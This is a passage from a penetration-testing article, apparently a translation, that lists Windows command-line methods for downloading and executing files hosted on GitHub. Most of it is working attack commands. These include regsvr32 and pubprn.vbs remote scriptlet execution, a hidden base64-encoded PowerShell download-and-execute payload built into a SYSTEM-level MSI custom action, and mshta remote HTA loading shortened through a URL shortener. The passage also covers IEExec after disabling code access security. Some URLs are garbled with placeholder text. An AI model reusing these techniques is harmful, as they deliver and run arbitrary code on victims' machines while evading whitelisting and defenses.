\"c:\\download\\a.exe\"\u003Cbr>ado.Close\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>This idea comes from @ogre\u003C\u002Fp>\u003Cp>VBS script implementation of execution code\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>WScript.CreateObject(\"WScript.Shell\").Run \"c:\\download\\a.exe\",0,true \u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Still using the sct file as a template, adding functionality to generate downloadexec2.sct\u003C\u002Fp>\u003Cp>\u003Cstrong>Functionality implemented:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>regsvr32 \u002Fu \u002Fs \u002Fi:https:\u002F\u002Fraw.githubusercontent.某开源项目.sct scrobj.dll\u003C\u002Fp>\u003Ch3>5、pubprn.vbs\u003C\u002Fh3>\u003Cp>Using pubprn.vbs enables execution of sct files on remote servers (sct file formats may differ)\u003C\u002Fp>\u003Cp>\u003Cstrong>Approach:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>regsve32-&gt;VBScript-&gt;download&amp;exec\u003C\u002Fp>\u003Cp>Code has been uploaded, address: https:\u002F\u002Fraw.githubusercontent.某开源项目.sct\u003C\u002Fp>\u003Cp>\u003Cstrong>Functionality implemented:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>cscript \u002Fb C:\\Windows\\System32\\Printing_Admin_Scripts\\zh-CN\\pubprn.vbs 127.0.0.1 script:https:\u002F\u002Fraw.githubusercontent.某开源项目.sct\u003C\u002Fp>\u003Cp>Alternatively, the following approach can be used (code omitted):\u003C\u002Fp>\u003Cp>regsve32-&gt;JScript-&gt;powershell-&gt;download&amp;exec\u003C\u002Fp>\u003Ch3>6、msiexec\u003C\u002Fh3>\u003Cp>This method was previously introduced in my two articles 'msiexec in Penetration Testing' and 'Penetration Techniques - Switching from Admin to System Privileges', details omitted here\u003C\u002Fp>\u003Cp>First encode the PowerShell download-and-execute code in base64:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$fileContent = \"(new-object System.Net.WebClient).DownloadFile('https:\u002F\u002Fgithub.com\u002F3gstudent\u002Ftest\u002Fraw\u002Fmaster\u002Fputty.exe','c:\\download\\a.exe');start-process 'c:\\download\\a.exe'\"\u003Cbr>$bytes  = [System.Text.Encoding]::Unicode.GetBytes($fileContent);\u003Cbr>$encoded = [System.Convert]::ToBase64String($bytes);\u003Cbr>$encoded\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Result:\u003C\u002Fp>\u003Cp>KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwAzAGcAcwB0AHUAZABlAG4AdAAvAHQAZQBzAHQALwByAGEAdwAvAG0AYQBzAHQAZQByAC8AcAB1AHQAdAB5AC4AZQB4AGUAJwAsACcAYwA6AFwAZABvAHcAbgBsAG8AYQBkAFwAYQAuAGUAeABlACcAKQA7AHMAdABhAHIAdAAtAHAAcgBvAGMAZQBzAHMAIAAnAGMAOgBcAGQAbwB3AG4AbABvAGEAZABcAGEALgBlAHgAZQAnAA==\u003C\u002Fp>\u003Cp>The complete PowerShell command is:\u003C\u002Fp>\u003Cp>powershell -WindowStyle Hidden -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwAzAGcAcwB0AHUAZABlAG4AdAAvAHQAZQBzAHQALwByAGEAdwAvAG0AYQBzAHQAZQByAC8AcAB1AHQAdAB5AC4AZQB4AGUAJwAsACcAYwA6AFwAZABvAHcAbgBsAG8AYQBkAFwAYQAuAGUAeABlACcAKQA7AHMAdABhAHIAdAAtAHAAcgBvAGMAZQBzAHMAIAAnAGMAOgBcAGQAbwB3AG4AbABvAGEAZABcAGEALgBlAHgAZQAnAA==\u003C\u002Fp>\u003Cp>The complete WIX file is:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003C!--?xml version=\"1.0\"?-->\u003Cbr>\u003Cwix xmlns=\"http:\u002F\u002Fschemas.microsoft.com\u002Fwix\u002F2006\u002Fwi\">\u003Cbr>  \u003Cproduct id=\"*\" upgradecode=\"12345678-1234-1234-1234-111111111111\" name=\"Example Product \u003Cbr>Name\" version=\"0.0.1\" manufacturer=\"@_xpn_\" language=\"1033\">\u003Cbr>    \u003Cpackage installerversion=\"200\" compressed=\"yes\" comments=\"Windows Installer Package\">\u003Cbr>    \u003Cmedia id=\"1\">\u003Cbr>\u003Cbr>    \u003Cdirectory id=\"TARGETDIR\" name=\"SourceDir\">\u003Cbr>      \u003Cdirectory id=\"ProgramFilesFolder\">\u003Cbr>        \u003Cdirectory id=\"INSTALLLOCATION\" name=\"Example\">\u003Cbr>          \u003Ccomponent id=\"ApplicationFiles\" guid=\"12345678-1234-1234-1234-222222222222\">     \u003Cbr>          \u003C\u002Fcomponent>\u003Cbr>        \u003C\u002Fdirectory>\u003Cbr>      \u003C\u002Fdirectory>\u003Cbr>    \u003C\u002Fdirectory>\u003Cbr>\u003Cbr>    \u003Cfeature id=\"DefaultFeature\" level=\"1\">\u003Cbr>      \u003Ccomponentref id=\"ApplicationFiles\">\u003Cbr>    \u003C\u002Fcomponentref>\u003C\u002Ffeature>\u003Cbr>\u003Cbr>    \u003Cproperty id=\"cmdline\">powershell -WindowStyle Hidden -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwAzAGcAcwB0AHUAZABlAG4AdAAvAHQAZQBzAHQALwByAGEAdwAvAG0AYQBzAHQAZQByAC8AcAB1AHQAdAB5AC4AZQB4AGUAJwAsACcAYwA6AFwAZABvAHcAbgBsAG8AYQBkAFwAYQAuAGUAeABlACcAKQA7AHMAdABhAHIAdAAtAHAAcgBvAGMAZQBzAHMAIAAnAGMAOgBcAGQAbwB3AG4AbABvAGEAZABcAGEALgBlAHgAZQAnAA==\u003Cbr>    \u003C\u002Fproperty>\u003Cbr>\u003Cbr>    \u003Ccustomaction id=\"SystemShell\" execute=\"deferred\" directory=\"TARGETDIR\" \u003Cbr=\"\">ExeCommand='[cmdline]' Return=\"ignore\" Impersonate=\"no\"\u002F&gt;\u003Cbr>\u003Cbr>    \u003Ccustomaction id=\"FailInstall\" execute=\"deferred\" script=\"vbscript\" return=\"check\">\u003Cbr>      invalid vbs to fail install\u003Cbr>    \u003C\u002Fcustomaction>\u003Cbr>\u003Cbr>    \u003Cinstallexecutesequence>\u003Cbr>      \u003Ccustom action=\"SystemShell\" after=\"InstallInitialize\">\u003C\u002Fcustom>\u003Cbr>      \u003Ccustom action=\"FailInstall\" before=\"InstallFiles\">\u003C\u002Fcustom>\u003Cbr>    \u003C\u002Finstallexecutesequence>\u003Cbr>\u003Cbr>  \u003C\u002Fcustomaction>\u003C\u002Fmedia>\u003C\u002Fpackage>\u003C\u002Fproduct>\u003Cbr>\u003C\u002Fwix>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Compile it to generate an msi file with the following commands:\u003C\u002Fp>\u003Cp>candle.exe msigen.wix\u003C\u002Fp>\u003Cp>light.exe msigen.wixobj\u003C\u002Fp>\u003Cp>Generate test.msi\u003C\u002Fp>\u003Cp>\u003Cstrong>Functionality implemented:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>`msiexec \u002Fq \u002Fi an open-source project\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>After execution, manually terminate the process msiexec.exe\u003C\u002Fp>\u003Ch3>7、mshta\u003C\u002Fh3>\u003Cp>mshta supports http and https\u003C\u002Fp>\u003Cp>However, when mshta executes hta scripts, similar to a browser, it performs corresponding parsing operations based on the link's response headers, so it only runs when the response header is html\u003C\u002Fp>\u003Cp>Otherwise, it will be parsed as plain text\u003C\u002Fp>\u003Cp>For code on GitHub, the returned format is text\u002Fplain\u003C\u002Fp>\u003Cp>If executed with the following command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mshta https:\u002F\u002Fraw.githubusercontent.com\u002F3gstudent\u002Ftest\u002Fmaster\u002Fcalc.hta\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>the code will be treated as text and cannot be parsed as html, causing the script to fail to execute\u003C\u002Fp>\u003Cp>But we can change our approach:\u003C\u002Fp>\u003Cp>Upload the hta file to a GitHub blog, and it will be parsed as html, enabling code execution\u003C\u002Fp>\u003Cp>Upload the hta file to a GitHub blog, with the address being https:\u002F\u002Fsome-open-source-project\u002Ftest\u002Fcalc.hta\u003C\u002Fp>\u003Cp>Execute the following command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mshta https:\u002F\u002F3gstudent.github.io\u002Ftest\u002Fcalc.hta\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Successfully launches the calculator\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>This idea comes from DM_\u003C\u002Fp>\u003Cp>Add functionality to achieve download and execution, with the following command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mshta https:\u002F\u002F3gstudent.github.io\u002Ftest\u002Fdownloadexec.hta\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>A pop-up indicates that security settings on this computer prohibit accessing data sources from other domains, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017964712_0_01c0bcfe43-1.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Solution:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>IE browser - Internet Options - Security\u003C\u002Fp>\u003Cp>Select Trusted Sites, add the blog address: https:\u002F\u002Fanopensourceproject\u002F\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017968528_1_8fa66fe541-1.jpeg\">\u003C\u002Fp>\u003Cp>Custom Level, find 'Access data sources across domains', select Enable\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017975011_2_a7a31b2e8e-1.jpeg\">\u003C\u002Fp>\u003Cp>Test again, successfully achieving the download and execution functionality\u003C\u002Fp>\u003Cp>Through the above tests, we found that the IE browser by default blocks download functionality implemented via VBS scripts\u003C\u002Fp>\u003Cp>Therefore, we can boldly speculate that if download and execution are implemented using PowerShell instead, it will not be blocked\u003C\u002Fp>\u003Cp>Modify the script and upload it to GitHub\u003C\u002Fp>\u003Cp>The command is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mshta https:\u002F\u002F3gstudent.github.io\u002Ftest\u002Fdownloadexec2.hta\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>After testing, this method is usable\u003C\u002Fp>\u003Cp>Use a short URL\u003C\u002Fp>\u003Cp>Interestingly, http:\u002F\u002Fdwz.cn\u002F does not support this domain\u003C\u002Fp>\u003Cp>Switch to another short URL website: http:\u002F\u002Fsina.lt\u002F\u003C\u002Fp>\u003Cp>Generate a short URL, the final command is:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mshta http:\u002F\u002Ft.cn\u002FRYUQyF8\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The final shortest character length achieved is 25\u003C\u002Fp>\u003Ch2>0x04 Supplement\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. IEExec\u003C\u002Fh3>\u003Cp>Requires administrator privileges\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>cd C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\\u003Cbr>caspol -s off\u003Cbr>IEExec http:\u002F\u002Fgithub.com\u002F3gstudent\u002Ftest\u002Fraw\u002Fmaster\u002Fputty.exe\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The exe must meet specific format requirements\u003C\u002Fp>\u003Cp>For details, refer to:\u003C\u002Fp>\u003Cp>https:\u002F\u002Froom362.com\u002Fpost\u002F2014\u002F2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe\u002F\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>I failed to reproduce this on Windows 7\u003C\u002Fp>\u003Ch2>0x05 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article summarizes methods for downloading files from GitHub via cmd, with the shortest implementation being mshta http:\u002F\u002Ft.cn\u002FRYUQyF8\u003C\u002Fp>\u003Cp>The minimum character length achieved is 25\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>",995,"Onedaysec",5,"published","2026-02-02T07:51:00.061Z",{"title":37,"description":14,"keywords":38,"ogImage":39,"canonicalUrl":39,"noIndex":40},"GitHub File Download Methods via CMD - Penetration Techniques","GitHub download, cmd techniques, penetration testing, PowerShell, certutil, bitsadmin, regsvr32, file execution",null,false,[],{"docs":43,"hasNextPage":40},[44,4,45,46],572,570,569,{"title":39,"description":39,"image":39},"2026-07-24T15:37:12.667Z","2026-07-23T16:01:45.444Z","draft","2026-07-23T16:13:26.607Z"]